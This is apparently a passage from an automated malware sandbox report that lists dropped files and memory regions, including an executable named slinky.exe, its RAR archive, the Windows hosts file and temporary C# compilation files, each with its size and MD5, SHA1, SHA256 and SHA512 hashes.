                                                                6b304c6036ea40140c732025abd158aba3834d810ecf96047452d81d8bef6ae1

                                                                SHA512

                                                                3aca459819a806ea614fe525afc7b995e11af66c7ddd8e2aafff2ffc970479c97880739eb19d575a70eb561e26bbd7d13252bb08292cd2efdf8f5f06a1c83548

                                                              • C:\Users\Admin\Desktop\slinky\slinky.exe

                                                                Filesize

                                                                14.2MB

                                                                MD5

                                                                5b9609530e3cb2dd1b86c43ebf4f9b25

                                                                SHA1

                                                                60a9327fcb847b169d099c5a289223c2a3043560

                                                                SHA256

                                                                3dbe2990bff79285935c181637d693c07e058837840aafe0b8c4d8eaac854ed1

                                                                SHA512

                                                                b2c3c0b9f9b7b1f5360c5c75258f5116b2e88642c884bb90f8d79c502cbb07ce0b58497fafcf3b972c52b19d97571a50777dd198fc5d377e2c373c72d23b0b50

                                                              • C:\Users\Admin\Downloads\slinky.rar

                                                                Filesize

                                                                26.1MB

                                                                MD5

                                                                3b10fbaa700b588fbab51c2586d3ddc4

                                                                SHA1

                                                                3f3b0672d4cdd4a5972b87ca876c3cf01f8b9161

                                                                SHA256

                                                                c9ee3e9731b8643c2d797a90adcb848bdd2cb90e7ff06c7ec6589550107d7aae

                                                                SHA512

                                                                94fda05c45d9a674a36b1cd469a544f4590ee2d4922c7ab30e6c592152b0ce408fbe580a1a67930e70db6b0a8aad3201f26e5438893fab253021705101388e31

                                                              • C:\Windows\System32\drivers\etc\hosts

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                6e2386469072b80f18d5722d07afdc0b

                                                                SHA1

                                                                032d13e364833d7276fcab8a5b2759e79182880f

                                                                SHA256

                                                                ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                                                SHA512

                                                                e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                                              • \??\c:\Users\Admin\AppData\Local\Temp\u2ylqpnw\CSC291A098498AB4C38BE9CF2141E525A96.TMP

                                                                Filesize

                                                                652B

                                                                MD5

                                                                85a79578f9dc383497407e1ff455fea2

                                                                SHA1

                                                                b8e24a12320c5ddf09572368e006db71fe16a197

                                                                SHA256

                                                                28825a320f11e24ec5149d95004ef42a7bbdf4b48a00fb1b43b2fad14398cfaf

                                                                SHA512

                                                                77eea71bba6e387289c034f50518600f6c11d278ae524184af87fd178fd3e0b322f42c260da16e2e769e8e41e2cf719efa0f5df0a160f2b75c6c03f4a4339d48

                                                              • \??\c:\Users\Admin\AppData\Local\Temp\u2ylqpnw\u2ylqpnw.0.cs

                                                                Filesize

                                                                1004B

                                                                MD5

                                                                c76055a0388b713a1eabe16130684dc3

                                                                SHA1

                                                                ee11e84cf41d8a43340f7102e17660072906c402

                                                                SHA256

                                                                8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                SHA512

                                                                22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                              • \??\c:\Users\Admin\AppData\Local\Temp\u2ylqpnw\u2ylqpnw.cmdline

                                                                Filesize

                                                                607B

                                                                MD5

                                                                a5302ee86b367eeee1272769a7632829

                                                                SHA1

                                                                d72b20dacfe6efba5880bfa7950d0046e7f7d94e

                                                                SHA256

                                                                06ae1f381bcf41c3e6a3fe40967295ecba3137dfc53deb47705058a95e3774b4

                                                                SHA512

                                                                d79791c95f1924d484712ae629bce633612928e723a46734e4f16b613ad871b447fd4c25e67704e17208b81c7e4fd4bc1ccca6248a11423068ba22c9eb63c825

                                                              • memory/3076-1122-0x000002220C460000-0x000002220C482000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/4000-1191-0x000002CA84040000-0x000002CA84048000-memory.dmp

                                                                Filesize

                                                                32KB

                                                              • memory/4000-1195-0x000002CA9CBA0000-0x000002CA9CD49000-memory.dmp

                                                                Filesize

                                                                1.7MB